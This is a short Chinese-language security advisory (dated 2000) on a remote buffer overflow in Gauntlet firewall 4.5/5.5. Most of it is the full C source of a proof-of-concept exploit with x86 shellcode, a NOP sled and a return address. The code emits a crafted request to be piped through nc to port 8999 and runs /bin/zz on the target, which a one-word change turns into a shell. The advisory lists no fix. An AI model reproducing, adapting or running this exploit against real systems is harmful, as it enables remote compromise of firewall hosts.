一个关于Gauntlet远程溢出漏洞发布时间:2000-05-12 更新时间:2000-05-12 严重程度:高 威胁程度:其它 错误类型:设计错误 利用方式:服务器模式 受影响系统 Gauntlet firewall 4.5;5.5详细描述 下面是一个有关Gauntlet firewall 远程溢出代码,漏洞原理请看前面的漏洞资料,但下面的代码作者进行了修改,把/bin/zz代替为/bin/sh,作者认为必须自己修改代码,而不是光光使用。大家可以使用在/bin目录下放一zz程序,任何程序即可进行测试。 测试代码 /* * Animal.c * * * Remote Gauntlet BSDI proof of concept exploit. * Garrison technologies may have found it, but I am the * one who released it. ;) I do not have a Sparc or I would * write up the Solaris one too. If you have one, please * make the changes needed and post it. Thanks. * * Script kiddies can go away, this will only execute a file * named /bin/zz on the remote firewall. To test this code, * make a file named /bin/zz and chmod it to 700. * I suggest for the test you just have the zz file make a note * in syslog or whatever makes you happy. * * This code is intened for proof of concept only. * * * _Gramble_ * Hey BuBBles * *To use: * # Animal | nc <address> 8999 */ #include <stdio.h> char data[364]; main() { int i; char shelloutput[80]; /* just borrowed this execute code from another exploit */ unsigned char shell[] = "\x90" "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c\x89\x76" "\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff\xff\xff\xff\x07" "\xff\xe8\xdc\xff\xff\xff/bin/zz\x00"; for(i=0;i<264;i++) data[i]=0x90; data[i]=0x30;i++; data[i]=0x9b;i++; data[i]=0xbf;i++; data[i]=0xef;i++; data[i] = 0x00; for (i=0; i<strlen(shell); i++) shelloutput[i] = shell[i]; shelloutput[i] = 0x00; printf("10003.http://%s%s", data, shelloutput); } 解决方案 尚无 相关信息 |
